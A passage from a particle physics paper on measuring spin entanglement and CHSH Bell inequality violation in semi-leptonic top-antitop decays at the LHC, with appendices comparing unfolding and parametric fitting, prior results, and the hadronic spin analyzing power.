In this article, we explored entanglement in the \(t\bar{t}\) system at the LHC via spin correlations when one of the top quarks decays leptonically and the other \begin{table} \begin{tabular}{||c||c c c||c c||} \hline \multirow{2}{*}{Parton-level} & \multirow{2}{*}{Efficiency} & \multicolumn{2}{c||}{\(\epsilon N_{\mathrm{parton}}\)} & \multicolumn{2}{c||}{\(B-\sqrt{2}\)} & \multicolumn{2}{c||}{Significance} \\ & & \((300\,\mathrm{fb}^{-1})\) & (Individual) & (Direct) & \((300\,\mathrm{fb}^{-1})\) & \((3000\,\mathrm{fb}^{-1})\) \\ \hline Weak & 0.080 & 6280 & \(0.22\pm 0.11\) & \(0.22\pm 0.10\) & \(2.2\sigma\) & \(7.0\sigma\) \\ \hline Strong & 0.078 & 4127 & \(0.26\pm 0.14\) & \(0.25\pm 0.12\) & \(2.0\sigma\) & \(6.4\sigma\) \\ \hline \hline \multirow{2}{*}{Reconstructed} & \multicolumn{2}{c||}{\(N_{\mathrm{detected}}\)} & \multicolumn{2}{c||}{\(B-\sqrt{2}\)} & \multicolumn{2}{c||}{Significance} \\ & \multicolumn{2}{c||}{\((300\,\mathrm{fb}^{-1})\)} & \multicolumn{2}{c||}{(Individual)} & \multicolumn{2}{c||}{(Direct)} & \multicolumn{2}{c||}{\((300\,\mathrm{fb}^{-1})\)} & \multicolumn{2}{c||}{\((3000\,\mathrm{fb}^{-1})\)} \\ \hline Weak & 6280 & \(0.23\pm 0.18\) & \(0.22\pm 0.22\) & \(1.3\sigma\) & \(4.1\sigma\) \\ \hline Strong & 4127 & \(0.27\pm 0.22\) & \(0.25\pm 0.28\) & \(1.2\sigma\) & \(3.8\sigma\) \\ \hline \end{tabular} \end{table} Table 3: Measurements of \((B-\sqrt{2})\) generated at \(\sqrt{s}=13\) TeV and \(\mathcal{L}=139\)\(\mathrm{fb}^{-1}\) at parton-level (top) and after detector simulation, reconstruction, and parametric fitting (bottom). CHSH violation is indicated by \((B-\sqrt{2})>0\). The efficiency indicated is the average over the specified signal region. The significance uses the direct measurement at parton-level and uses the individual measurement at reconstruction-level. hadronically. This channel has advantages over the fully leptonic channel, namely that there are roughly six times more events and the kinematic reconstruction is more efficient. In Sec. 2, after a brief review of quantum entanglement and Bell non-locality, we identified observables to test these quantum properties. These quantum observables were related to collider observables in Sec. 3. In particular the spins of the \(t\) and \(\bar{t}\) are the qubits while spin correlations encode the entanglement between qubits. The spins are then measured through the angles of the decay products of the \(t\) and \(\bar{t}\). In Sec. 4, we showed our results in searching for evidence of quantum entanglement and Bell inequality violation in the semi-leptonic decay channel where the final state includes one lepton, one neutrino, two \(b\)-jets, and two light-quark-initiated jets from the \(W\) decay. The \(t\bar{t}\) system exhibits entanglement both near threshold and at high \(p_{T}\). We showed that the events near threshold provide a more sensitive probe of quantum entanglement owing to a larger number of events relative to the high-\(p_{T}\) region. Tests of Bell inequality violation, on the other hand, require a stronger signal which is only present in the signal region with highly-boosted top quarks. The semi-leptonic channel, which is the focus of this work, yields a higher efficiency for event reconstruction than the leptonic case. Going beyond just the parton-level analysis, we performed a detector simulation, followed by parametric fitting to correct the detailed angular observables. We found that this approach leads to a more stable outcome than the practice of unfolding. 
As a result, the sensitivity for quantum entanglement detection is expected to be 60% better than in the leptonic channel. In 139 fb\({}^{-1}\) (3 ab\({}^{-1}\)) of data at the LHC (HL-LHC), it should be feasible to measure entanglement at a precision of \(\lesssim 3\%\) (0.7%), as shown in Table 2 and in Fig. 9.

Figure 10: Expected significance of CHSH violation detection as a function of the integrated luminosity at the 13 TeV LHC at parton-level (left) and after detector simulation, reconstruction, and parametric fitting (right).

The same expectation of a 60% improvement applies to Bell inequality violation detection. When compared to previous leptonic studies at detector-level, the improvement reaches a factor of 3, due to the substantially higher reconstruction efficiency we achieve. The overall detection of Bell inequality violation, however, is still challenging. With 300 fb\({}^{-1}\) (3 ab\({}^{-1}\)) integrated luminosity at the LHC Run-3 (HL-LHC), we expect a sensitivity of 1.3\(\sigma\) (4.1\(\sigma\)), as shown in Table 3 and Fig. 10. A full comparison with previous results is given in Appendix B. In summary, we demonstrated that the semi-leptonic decay of the \(t\bar{t}\) system is the premier channel for testing entanglement and Bell inequality violation at the LHC. Performing a detector simulation and correcting the results with parametric fitting are indispensable components of an accurate prediction. We project that at the HL-LHC entanglement can be measured nearly to the percent level and that strong evidence will be obtained for Bell inequality violation. There are a number of future directions, such as studying the fully hadronic decay channel of the \(t\bar{t}\) system and describing the small backgrounds in a quantum mechanical framework. The LHC is a promising environment to study quantum mechanics at the TeV scale.

## Acknowledgements

The authors would like to thank Mikael Kuusela for detailed discussion on unfolding, Joseph Boudreau and Kun Cheng for useful discussions, and Ze Chen for computing assistance. This work was supported in part by the U.S. Department of Energy under grant Nos. DE-SC0007914 and in part by the Pitt PACC. TH would like to thank the Aspen Center for Physics, where part of this work was completed, which is supported by the National Science Foundation (NSF) grant PHY-1607611. ML is also supported by the National Science Foundation under grant no. PHY-2112829.

## Appendix A Unfolding and Parametric Fitting

Consider a distribution \(\vec{x}_{\rm truth}\) that is produced at a collider experiment, for example the invariant mass or energy spectrum of a particle. This underlying distribution is not measured directly because the detector itself has limited acceptance and finite resolution, which result in smearing. Thus the detected distribution is \(\vec{x}_{\rm detected}\). The truth and detected distributions can be related by the forward process which can be called "folding" [71; 72; 73]:

\[\vec{x}_{\rm truth}\xrightarrow{\rm folding}\vec{x}_{\rm detected}=R\cdot\vec{x}_{\rm truth}, \tag{101}\]

where the matrix \(R\) is the response matrix that describes the effects of detector smearing and phase space cuts. Only \(\vec{x}_{\rm detected}\) is measured, but we require \(\vec{x}_{\rm truth}\) to extract the underlying physics parameters. To do this, first, \(\vec{x}_{\rm truth}\) is generated by Monte Carlo.
Then a detector simulation can produce \(\vec{x}_{\rm detected}\) from \(\vec{x}_{\rm truth}\), which allows us to compute \(R\) from Monte Carlo. Given \(R\) we can make an estimate of \(\vec{x}_{\rm truth}\) that corresponds to some detected data.

### Unfolding

Unfolding is the mathematical procedure of inverting Eq. (101) in order to solve for \(\vec{x}_{\rm truth}\):

\[\vec{x}_{\rm unfolded}=R^{-1}\cdot\vec{x}_{\rm detected}. \tag{109}\]

Once \(\vec{x}_{\rm unfolded}\) is obtained, the underlying physics parameters \(\Theta\) can be extracted through a fit, asymmetry measurement, etc. The response matrix \(R\) quantifies the detector smearing and the loss of events which do not pass phase space cuts, and is therefore often an ill-conditioned matrix. To find a stable inversion of \(R\), one typically needs to apply regularization, where ambiguity arises in choosing the form and the strength of the regularization. That is why we write \(\vec{x}_{\rm unfolded}\) in Eq. (109) rather than \(\vec{x}_{\rm truth}\). As explained in Ref. [74], without a careful choice of regularization strength one may induce a bias and underestimate the uncertainty. Recent methods have been proposed to avoid such subtleties [70]. The bias quantifies how far the unfolded distribution \(\vec{x}_{\rm unfolded}\) is from a true inversion of the response matrix applied to \(\vec{x}_{\rm detected}\). When \(R\) is ill-conditioned, some bias is necessary, but a large bias indicates that \(\vec{x}_{\rm unfolded}\) does not accurately describe \(\vec{x}_{\rm truth}\). The variance measures how much the unfolded distribution changes with respect to statistically different detected data. We list several unfolding algorithms in Table 4 along with the package we use for their implementation and their regularization parameters. The Iterative Bayesian (IB) method [67] is regularized by the number of iterations \(n_{I}\). The Singular Value Decomposition (SVD) method [68] is parametrized by \(\tau\), which is the coefficient of the regularization term. The value of \(\tau\) is often set by the square of the \(m\)th singular value (in descending order) of a matrix related to the second derivative of the truth distribution. Both of these methods are commonly used in theory studies. The One-at-a-time Strict Bounds (OSB) method, on the other hand, is not commonly used, but is free from any regularization [70]. Instead, the inputs are general constraints on the expected shape of the unfolded distribution. To compare methods we consider the two quantities: \(\cos\theta_{n}^{\mathcal{A}}\cos\theta_{n}^{\mathcal{B}}\) and \(\cos\theta_{r}^{\mathcal{A}}\cos\theta_{r}^{\mathcal{B}}\). Events are restricted to the weak signal region described in Sec. 4.4, which is relevant for Bell inequality violation.

\begin{table}
\begin{tabular}{|c c c|}
\hline
Method & Package & Regularization Parameters \\
\hline
Iterative Bayesian (IB) & RooUnfoldBayes [69] & \(n_{I}\) \\
Singular Value Decomposition (SVD) & RooUnfoldSvd [69] & \(\tau\) or \(m\) \\
One-at-a-time Strict Bounds (OSB) & Ref. [70] & \(-\) \\
\hline
\end{tabular}
\end{table}

Table 4: Unfolding algorithms and their regularization parameters.

We use an integrated luminosity of 300 fb\({}^{-1}\). The functional form of the truth distribution is given in Eq. (28). In Fig. 11 we show the distribution at parton-level with only signal region cuts (red) and after detector effects and event selection cuts (orange).
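As an illustration of Eq. (101) and of why a regularized inversion is needed, the following is a minimal numerical sketch (not the analysis code used in this work): it builds a response matrix from toy Monte Carlo, folds a truth histogram, and applies the iterative Bayesian update of the IB method. The truth shape, the Gaussian smearing width, and the flat 60% efficiency are illustrative assumptions.

```python
import numpy as np

rng = np.random.default_rng(7)

# --- illustrative truth model (not the analysis distribution) ---------------
n_bins = 12
edges = np.linspace(-1.0, 1.0, n_bins + 1)
centers = 0.5 * (edges[:-1] + edges[1:])

def truth_pdf(x):
    return 0.5 * (1.0 - 0.4 * x)                 # assumed linear shape

# --- build the response matrix R from toy "Monte Carlo" ---------------------
n_mc = 500_000
x_true = rng.uniform(-1, 1, n_mc)
x_true = x_true[rng.uniform(0, 1, n_mc) < truth_pdf(x_true) / truth_pdf(-1.0)]
x_det = x_true + rng.normal(0.0, 0.15, x_true.size)       # assumed smearing
accepted = rng.uniform(0, 1, x_true.size) < 0.6           # assumed efficiency

R, _, _ = np.histogram2d(x_det[accepted], x_true[accepted], bins=[edges, edges])
R /= np.maximum(np.histogram(x_true, bins=edges)[0], 1)   # P(detected bin | truth bin)

# --- fold a truth histogram and add Poisson fluctuations ---------------------
truth_hist = 5000.0 * truth_pdf(centers) / truth_pdf(centers).sum()
detected = rng.poisson(R @ truth_hist)

# --- iterative Bayesian (D'Agostini-style) unfolding, regularized by n_iter --
def unfold_ib(detected, R, n_iter=4):
    eff = R.sum(axis=0)                          # per-truth-bin efficiency
    prior = np.full(R.shape[1], detected.sum() / R.shape[1])
    for _ in range(n_iter):
        folded = R @ prior
        post = R * prior / np.maximum(folded[:, None], 1e-12)   # P(truth | detected)
        prior = (post * detected[:, None]).sum(axis=0) / np.maximum(eff, 1e-12)
    return prior

print(np.round(unfold_ib(detected, R), 1))       # compare with truth_hist
```

Increasing `n_iter` weakens the regularization, which is the behaviour of \(n_{I}\) studied below.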
The uncertainties are determined by calculating the variance from performing the same calculation on different instances of the same dataset, _i.e._ running pseudo-experiments. The response matrices for these processes are shown in Fig. 12. Figure 11 also shows the unfolding methods: OSB (blue), IB (light blue), and SVD (green). For the OSB method, we require the unfolded distribution to be positive over the full domain and, separately over negative and positive input values, to be monotonic and convex. We follow the aggregation strategy of starting with an initial value of \(n_{\rm bin}=48\) before aggregating these into larger bins. For the IB method we use \(n_{I}=4\) and \(n_{\rm bin}=12\), while for the SVD method we use \(m=4\) and \(n_{\rm bin}=12\). The results show a very stable central value for all the methods; however, the uncertainty varies substantially between methods. The OSB method does not have free parameters while the IB and SVD methods do have free parameters. We investigate the dependence on these parameters further below. Intuitively, as the regularization strength increases, more bias is introduced but the variance decreases. When the regularization strength decreases, the bias is reduced but the variance increases. In Table 5 we vary the regularization parameter \(n_{I}\) and the number of bins \(n_{\rm bin}\) using the IB method. We show results for measuring \(C_{nn}\), \(C_{rr}\), and the combination \(C_{nn}-C_{rr}-\sqrt{2}\). We find that the unfolded central values are stable under variations in both \(n_{I}\) and \(n_{\rm bin}\). The uncertainty, on the other hand, is stable under changes in \(n_{\rm bin}\), but varies by up to 75% while changing \(n_{I}\). Larger \(n_{I}\) reduces the regularization, which is why the uncertainty increases with \(n_{I}\).

Figure 11: Distributions of \(\cos\theta_{n}^{\mathcal{A}}\cos\theta_{n}^{\mathcal{B}}\) (left) and \(\cos\theta_{r}^{\mathcal{A}}\cos\theta_{r}^{\mathcal{B}}\) (right) for parton-level truth data (red), for detector-level data (orange), and after applying the unfolding methods OSB (blue), IB (light blue), and SVD (green), computed at \(\sqrt{s}=13\) TeV.

Table 6 shows results using the SVD method while varying the regularization parameter \(m\) and the number of bins \(n_{\rm bin}\). Again, the central value is stable with respect to changes in \(m\) and \(n_{\rm bin}\), but the uncertainty changes with \(n_{\rm bin}\) and with \(m\) by up to 75%. A larger value of \(m\) means taking a smaller squared singular value, which corresponds to less regularization.

\begin{table}
\begin{tabular}{|c|c|c|c|c|c|}
\hline
parameter & \(n_{\rm bin}\) & SVD \(m=3\) & SVD \(m=4\) & SVD \(m=5\) & SVD \(m=6\) \\
\hline
\multirow{2}{*}{\(C_{nn}\)} & 6 & \(0.749\pm 0.132\) & \(0.749\pm 0.161\) & \(0.749\pm 0.184\) & \(0.750\pm 0.199\) \\
 & 12 & \(0.746\pm 0.115\) & \(0.748\pm 0.136\) & \(0.748\pm 0.152\) & \(0.749\pm 0.169\) \\
\hline
\multirow{2}{*}{\(C_{rr}\)} & 6 & \(-0.892\pm 0.165\) & \(-0.892\pm 0.230\) & \(-0.900\pm 0.260\) & \(-0.897\pm 0.303\) \\
 & 12 & \(-0.894\pm 0.142\) & \(-0.899\pm 0.189\) & \(-0.900\pm 0.209\) & \(-0.899\pm 0.245\) \\
\hline
\multirow{2}{*}{\(C_{nn}-C_{rr}-\sqrt{2}\)} & 6 & \(0.226\pm 0.211\) & \(0.227\pm 0.280\) & \(0.235\pm 0.318\) & \(0.232\pm 0.363\) \\
 & 12 & \(0.226\pm 0.167\) & \(0.232\pm 0.219\) & \(0.233\pm 0.247\) & \(0.234\pm 0.287\) \\
\hline
\end{tabular}
\end{table}

Table 6: Parameter estimation via unfolding with the SVD method.
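For completeness, the pseudo-experiment prescription used for the uncertainties throughout this appendix can be written in a few lines; the binning, the expected yields, and the simple mean-of-the-observable estimator below are placeholders, the point being only that the quoted uncertainty is the spread of the estimator over Poisson-fluctuated replicas of the measurement.

```python
import numpy as np

rng = np.random.default_rng(11)

def pseudo_experiment_error(expected_counts, estimator, n_trials=2000):
    """Spread of an estimator over Poisson-fluctuated replicas of a binned measurement."""
    values = [estimator(rng.poisson(expected_counts)) for _ in range(n_trials)]
    return float(np.mean(values)), float(np.std(values, ddof=1))

# toy example: 12 bins of an observable x in [-1, 1]; the estimator is the
# sample mean of x, which is sensitive to the slope of the distribution
centers = np.linspace(-1, 1, 12, endpoint=False) + 1.0 / 12
expected = 400.0 * (1.0 - 0.3 * centers)          # assumed shape and yield

mean_x = lambda counts: np.average(centers, weights=counts)
print(pseudo_experiment_error(expected, mean_x))
```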
Figure 12: Response matrix of \(\cos\theta_{n}^{\cal A}\cos\theta_{n}^{\cal B}\) (left) and \(\cos\theta_{r}^{\cal A}\cos\theta_{r}^{\cal B}\) (right) computed at \(\sqrt{s}=13~{}{\rm TeV}\). Parton-level events have signal region cuts and no event selection, while detector-level events include detector effects and the effects of event selection described in Sec. 4.2.

### Parametric Fitting

When only the extracted physics parameter \(\Theta\) is required, and not the full distribution \(\vec{x}_{\rm truth}\), one can calculate the dependence of the truth distribution on the parameter \(\Theta\). This is the method more commonly used by experimentalists [71; 72; 73] and in this work we will call it "parametric fitting." This is sometimes called template fitting when the functional dependence on \(\Theta\) is unknown and template distributions are used. Writing the truth distribution as a function of \(\Theta\) we have

\[\vec{x}_{\rm truth}(\Theta)\xrightarrow{\rm folding}\vec{x}_{\rm predicted}(\Theta)=R\cdot\vec{x}_{\rm truth}(\Theta). \tag{101}\]

The parameter \(\Theta\) is now extracted by fitting \(\vec{x}_{\rm predicted}(\Theta)\) to \(\vec{x}_{\rm detected}\). We perform this parameter extraction by a binned maximum likelihood fit where the likelihood function is

\[L(\Theta)=\prod_{\alpha=1}^{\rm n_{bins}}\text{Poisson}\left(x_{\rm detected,\alpha},x_{\rm predicted,\alpha}(\Theta)\right), \tag{102}\]
\[=\prod_{\alpha=1}^{\rm n_{bins}}\text{Poisson}\left(x_{\rm detected,\alpha},\sum_{\beta}R_{\alpha\beta}x_{\rm truth,\beta}(\Theta)\right), \tag{103}\]

where \(\text{Poisson}(x,\lambda)\) is the Poisson distribution for random variable \(x\) with mean \(\lambda\). The response matrix \(R\) is calculated from simulation, and the distribution \(x_{\rm truth}(\Theta)\) is known analytically as a function of \(\Theta\) in all cases that we study. For example, for \(\Theta=C_{ij}\), the truth distribution is given by Eq. (10). To obtain \(\Theta\) we maximize the logarithm of the likelihood function. As with unfolding, the uncertainty is calculated by performing pseudo-experiments. When varying the number of bins (\(n_{\rm bin}=5,10,20\)) we find the uncertainty changes by less than \(5\%\). Table 7 contrasts the results from parametric fitting with OSB unfolding. The truth result is used as a baseline where there are no smearing effects, but the number of events used to determine the uncertainty is rescaled by the average reconstruction efficiency.

\begin{table}
\begin{tabular}{|c|c|c|c|}
\hline
 & Truth & OSB Unfolding & Parametric Fitting \\
\hline
\(C_{nn}\) & \(0.754\pm 0.079\) & \(0.748\pm 0.370\) & \(0.754\pm 0.116\) \\
\hline
\(C_{rr}\) & \(-0.884\pm 0.079\) & \(-0.890\pm 0.472\) & \(-0.892\pm 0.137\) \\
\hline
\(C_{nn}-C_{rr}-\sqrt{2}\) & \(0.224\pm 0.112\) & \(0.223\pm 0.600\) & \(0.231\pm 0.179\) \\
\hline
\end{tabular}
\end{table}

Table 7: Parameter estimation via OSB unfolding and parametric fitting computed at \(\sqrt{s}=13\) TeV in the weak signal region. The uncertainties on the truth results are statistical.

While OSB unfolding does not have a dependence on regularization, the resulting uncertainties are substantially larger than the statistical uncertainties. Parametric fitting also does not depend on regularization and increases the uncertainty, but by a more modest amount.
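A minimal sketch of the binned maximum-likelihood fit of Eqs. (102)-(103) is shown below. The one-parameter truth shape and the Gaussian-migration response matrix are stand-ins chosen for illustration, not the \(C_{ij}\) distribution of Eq. (10) or the simulated detector response used in the analysis.

```python
import numpy as np
from scipy.optimize import minimize_scalar
from scipy.stats import poisson

rng = np.random.default_rng(3)

n_bins = 10
edges = np.linspace(-1.0, 1.0, n_bins + 1)
centers = 0.5 * (edges[:-1] + edges[1:])
width = edges[1] - edges[0]

def truth_hist(theta, n_events):
    """Binned truth prediction for an assumed shape 0.5*(1 + theta*x)."""
    return n_events * 0.5 * (1.0 + theta * centers) * width

# assumed response: Gaussian bin-to-bin migration, columns normalized to a 60% efficiency
dist = centers[:, None] - centers[None, :]
R = np.exp(-0.5 * (dist / 0.25) ** 2)
R = 0.6 * R / R.sum(axis=0)

theta_true, n_events = 0.4, 20_000
detected = rng.poisson(R @ truth_hist(theta_true, n_events))

def nll(theta):
    """Negative log-likelihood corresponding to Eq. (103)."""
    predicted = R @ truth_hist(theta, n_events)
    return -poisson.logpmf(detected, predicted).sum()

fit = minimize_scalar(nll, bounds=(-0.99, 0.99), method="bounded")
print(f"fitted theta = {fit.x:.3f} (generated with theta = {theta_true})")
```

The uncertainty would then be obtained exactly as in the pseudo-experiment sketch above, by repeating the fit on Poisson-fluctuated copies of `detected`.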
The increase in uncertainty depends on the detector smearing, the phase space cuts, and the form of the expected distribution for the parameter. For this reason, each fitted parameter has a different increase in uncertainty relative to the statistics-only uncertainty. In Table 7 the increase is about a factor of \(1.4-1.7\), while for concurrence it is a factor of \(1.9-3.4\) and for Bell inequality violation it is a factor of \(1.6-2.2\).

## Appendix B Comparison to Previous Results

As a validation step, we compare our results with the parton-level results in Ref. [8] and the detector-level results in Ref. [6]. Our results are for the semi-leptonic channel and we use the event selection specified in Sec. 4.2. For the purposes of comparison we do not use our signal regions but instead use the signal regions from Ref. [8] and Ref. [6]. The parton-level comparison is shown in Table 8. We apply an efficiency of 0.12 and use a luminosity of 139 fb\({}^{-1}\) to match Ref. [8]. The central values agree relatively well. The small differences may result from using different PDF sets [8]. As estimated in Sec. 4.1, our uncertainties should be about 60% smaller than the leptonic results. The table confirms that this is an accurate estimate. The detector-level comparison is shown in Table 9. We use a luminosity of 139 fb\({}^{-1}\) for entanglement and 350 fb\({}^{-1}\) for CHSH violation to match Ref. [6]. In the threshold region the efficiencies are similar: their leptonic sample has an efficiency of 0.08 while our semi-leptonic sample has an efficiency of 0.012. In the high-\(p_{T}\) region their leptonic sample has an efficiency of 0.011 (taken from Appendix B of Ref. [8]) while our semi-leptonic sample has an efficiency of 0.08. The higher efficiency in the semi-leptonic sample is expected. For entanglement, the central values are similar, but not quite matching. Our central values in these regions, however, do match with those from Ref. [8]. For the "threshold, strong" region our uncertainty is larger by a factor of 2. In this region the unfolding adds no uncertainty in Ref. [6], while in our work the parametric fitting always increases the uncertainty by a factor of \(1.6-3\). Accounting for the 60% improvement from statistics in the semi-leptonic channel, these results are consistent. In the "high-\(p_{T}\), strong" region our uncertainty is lower by 25%.

\begin{table}
\begin{tabular}{|c|c|c|c|c|}
\hline
Observable & \multicolumn{3}{c|}{Entanglement: \(|C_{rr}+C_{kk}|-C_{nn}-1\)} & CHSH: \((C_{rr}-C_{nn})-\sqrt{2}\) \\
\hline
Region & Threshold \(\not{\beta}\) & Threshold \(\beta\) & Boosted & Boosted \\
\hline
Ref. [8] & \(0.560\pm 0.020\) & \(0.680\pm 0.022\) & \(0.671\pm 0.069\) & \(0.218\pm 0.141\) \\
\hline
This work & \(0.529\pm 0.013\) & \(0.634\pm 0.015\) & \(0.650\pm 0.042\) & \(0.212\pm 0.085\) \\
\hline
\end{tabular}
\end{table}

Table 8: Parton-level comparison between the leptonic results from Ref. [8] and the semi-leptonic results from this work. The semi-leptonic channel is expected to have uncertainties that are 60% smaller.

The unfolding from Ref. [6] increased the uncertainty by about a factor of 1.5. For CHSH violation, the central values are consistent. In the "high-\(p_{T}\), strong" region our uncertainty is a factor of 3.4 smaller. While the unfolding from Ref. [6] still only increases the statistical uncertainty by a factor of 1.5, the reconstruction efficiency in our sample is much higher. Finally, we briefly compare to Ref. [16].
They provide detector-level results which include a deep neural network reconstruction algorithm and SVD unfolding. Our weak signal region from Sec. 4.4 has approximately three times more events than the signal region used in Ref. [16]. In addition, our parametric fitting increases the statistical uncertainty by a factor of roughly 3, while in Ref. [16] the unfolding decreases the statistical uncertainty slightly.

\begin{table}
\begin{tabular}{|c|c|c|c|}
\hline
Observable & \multicolumn{2}{c|}{Entanglement: \(|C_{rr}+C_{kk}|-C_{nn}-1\)} & CHSH: \((C_{rr}-C_{nn})-\sqrt{2}\) \\
\hline
Region & Threshold, strong & High-\(p_{T}\), strong & High-\(p_{T}\), strong \\
\hline
Ref. [6] & \(0.38\pm 0.02\) & \(0.42\pm 0.10\) & \(0.21\pm 0.54\) \\
\hline
This work & \(0.45\pm 0.04\) & \(0.58\pm 0.08\) & \(0.19\pm 0.16\) \\
\hline
\end{tabular}
\end{table}

Table 9: Detector-level comparison between the leptonic results from Ref. [6] and the semi-leptonic results from this work. The semi-leptonic channel is expected to have uncertainties that are 60% smaller without accounting for differences in reconstruction efficiency. The CHSH result from Ref. [6] is multiplied by \(1/\sqrt{2}\) to match our normalization.

## Appendix C Spin Analyzing Power for Hadronic Top Decays

Consider an ensemble of polarized top quarks with polarization vector \(\vec{B}\), where \(0\leq|\vec{B}|\leq 1\). The differential decay width of the top quark is

\[\frac{1}{\Gamma}\frac{d\Gamma}{d\cos\theta_{v}}=\frac{1}{2}\left(1+|\vec{B}|\kappa_{v}\cos\theta_{v}\right), \tag{109}\]

where \(\cos\theta_{v}=(\vec{B}\cdot\vec{v})/(|\vec{B}||\vec{v}|)\) for a direction \(\vec{v}\) associated with the decay products. The coefficient \(\kappa_{v}\) is the spin analyzing power associated with the direction \(\vec{v}\). In the leptonic decay of a top quark, if \(\vec{v}=\vec{p}_{\ell^{+}}\) then \(\kappa_{\ell^{+}}=1.0\). The spin analyzing power ranges from \(-1\) to \(+1\), so the anti-lepton carries the maximum amount of information about the polarization of the top quark. The spin analyzing powers of the other decay products can be calculated and, at leading order, are [75]

\[\kappa_{W^{+}}=0.40,\qquad\kappa_{b}=-0.40,\qquad\kappa_{\nu}=-0.34. \tag{110}\]

For the decay of the anti-top quark, the spin analyzing power is equal in magnitude and opposite in sign for the corresponding anti-particles in the decay products. In hadronic decays of the top quark, the vertex structure is the same with the replacement of \(\ell^{+}\to\) down-type anti-quark and \(\nu\to\) up-type quark. The complication in this case is that the down-type anti-quark cannot be distinguished from the up-type quark on an event-by-event basis. They are both detected as jets. Early on, the softer jet (the jet with the lower energy in the top rest frame) was used and has a spin analyzing power of \(\kappa_{\rm soft}=0.50\) [75]. The intuition is that the down-type anti-quark tends to be emitted closer to the \(b\)-quark, which more often makes it the softer jet. In Ref. [51] it was shown that the optimal spin analyzing power uses a weighted sum of both the quark and anti-quark.
The optimal hadronic direction \(\vec{p}_{\rm opt}\) is \[\vec{p}_{\rm opt}(\cos\theta_{W})=P_{d\to p_{\rm soft}}(\cos\theta_{W})\, \hat{p}_{\rm soft}+P_{d\to p_{\rm hard}}(\cos\theta_{W})\,\hat{p}_{\rm hard}, \tag{111}\] where \(\hat{p}_{\rm soft}\) is the normalized three-momentum of the softer jet, \(\hat{p}_{\rm hard}\) is the normalized three-momentum of the harder jet, and \(\theta_{W}\) is the angle between one of the \(W\) decay products and the \(W\) momentum axis in the \(W\) rest frame (shown in Fig. 2). The functions \(P_{d\to p_{\rm soft}}(\cos\theta_{W})\) and \(P_{d\to p_{\rm hard}}(\cos\theta_{W})\) are \[P_{d\to p_{\rm soft}}(\cos\theta_{W}) =\frac{f(-|\cos\theta_{W}|)}{f(|\cos\theta_{W}|)+f(-|\cos\theta_{ W}|)}, \tag{112}\] \[P_{d\to p_{\rm hard}}(\cos\theta_{W}) =\frac{f(|\cos\theta_{W}|)}{f(|\cos\theta_{W}|)+f(-|\cos\theta_{ W}|)}. \tag{113}\] The function \(f(\cos\theta_{W})\) is the probability distribution of \(\cos\theta_{W}\) which depends on the polarization of the \(W\) boson coming from the decay of the top [51]. Neglecting the \(b\) mass the distribution is \[f(\cos\theta_{W})=\frac{3}{4}\frac{m_{t}^{2}}{m_{t}^{2}+2m_{W}^{2}}(1-\cos^{2 }\theta_{W})+\frac{3}{8}\frac{2m_{W}^{2}}{m_{t}^{2}+2m_{W}^{2}}(1-\cos\theta_ {W})^{2}. \tag{114}\] The dependence of Eq. (111) on \(\cos\theta_{W}\) means that the spin analyzing power also is a function of \(\cos\theta_{W}\). The dependence of the spin analyzing power on \(\cos\theta_{W}\) is nearly flat [51]. From theory, the predicted integrated value of the spin analyzing power is \(\kappa_{\rm opt}=0.638\). To ensure the validity of our results for entanglement and Bell inequality violation we compute the spin analyzing power from simulation. We use Madgraph 5[56] to generate a sample of polarized top quarks. The differential decay width as a function of \(\cos\theta\) taken with respect to \(\vec{p}_{\rm opt}\) is shown in Fig. 13. The parton-level distribution is shown in red and yields a value of \(\kappa_{\rm opt}=0.640\pm 0.004\). The distribution at the uncorrected detector-level is shown in orange. The blue markers indicate the distribution after unfolding and lead to a value of \(\kappa_{\rm opt}=0.654\pm 0.037\). Using parametric fitting yields \(\kappa_{\rm opt}=0.642\pm 0.030\). These numbers are summarized in Table 10. Having shown the robustness of the optimal hadronic spin analyzing power we use the value of \(\kappa_{\rm opt}=0.64\) in our results for entanglement and Bell inequality violation. ## Appendix D Quantum versus Fictitious States In this appendix we highlight relevant differences between quantum states and fictitious states. ### Non-Spin Degrees of Freedom The \(t\bar{t}\) system at a collider is labeled by the top quark momentum in center-of-mass frame \(\vec{k}\), the velocity \(\vec{v}\) of the \(t\bar{t}\) system relative to the lab frame, and the spins of the top and the anti-top quarks. We denote the spin as \(\left|\alpha\right\rangle=\left|\text{spin of }t\right\rangle\otimes\left|\text{ spin of }\bar{t}\right\rangle\). The spin density matrix \(\rho_{\text{spin}}\) for the \(t\bar{t}\) system with a given \(\vec{k}\) and \(\vec{v}\) (which we will refer to as individual density matrix) can be written as \[\rho_{\text{spin}}(\vec{k},\vec{v})=\sum_{\alpha,\beta}\rho(\vec{k},\vec{v})_ {\alpha,\beta}\left|\alpha\right\rangle\left\langle\beta\right|. \tag{101}\] Each value of \(\vec{k}\) and \(\vec{v}\) yields a distinct quantum state. 
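As an aside to Appendix C above, the weighting that defines the optimal hadronic direction in Eqs. (111)-(114) is straightforward to evaluate numerically. In this sketch the top and \(W\) masses are assumed input values and \(\hat{p}_{\rm soft}\), \(\hat{p}_{\rm hard}\) are unit vectors supplied by the caller.

```python
import numpy as np

M_T, M_W = 172.5, 80.4                       # GeV, assumed mass values

def f(c):
    """cos(theta_W) distribution of Eq. (114), neglecting the b-quark mass."""
    norm = M_T**2 + 2.0 * M_W**2
    return (0.75 * M_T**2 / norm) * (1.0 - c**2) + (0.375 * 2.0 * M_W**2 / norm) * (1.0 - c)**2

def soft_hard_weights(cos_theta_w):
    """P(d -> softer jet) and P(d -> harder jet) from Eqs. (112)-(113)."""
    c = abs(cos_theta_w)
    p_soft = f(-c) / (f(c) + f(-c))
    return p_soft, 1.0 - p_soft

def optimal_direction(p_soft_hat, p_hard_hat, cos_theta_w):
    """Weighted hadronic direction of Eq. (111); inputs are unit 3-vectors."""
    w_soft, w_hard = soft_hard_weights(cos_theta_w)
    return w_soft * np.asarray(p_soft_hat) + w_hard * np.asarray(p_hard_hat)

# the two jets are weighted equally near cos(theta_W) = 0, while the softer jet
# is increasingly favoured as the down-type candidate for |cos(theta_W)| -> 1
for c in (0.0, 0.5, 0.9):
    print(c, np.round(soft_hard_weights(c), 3))
```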
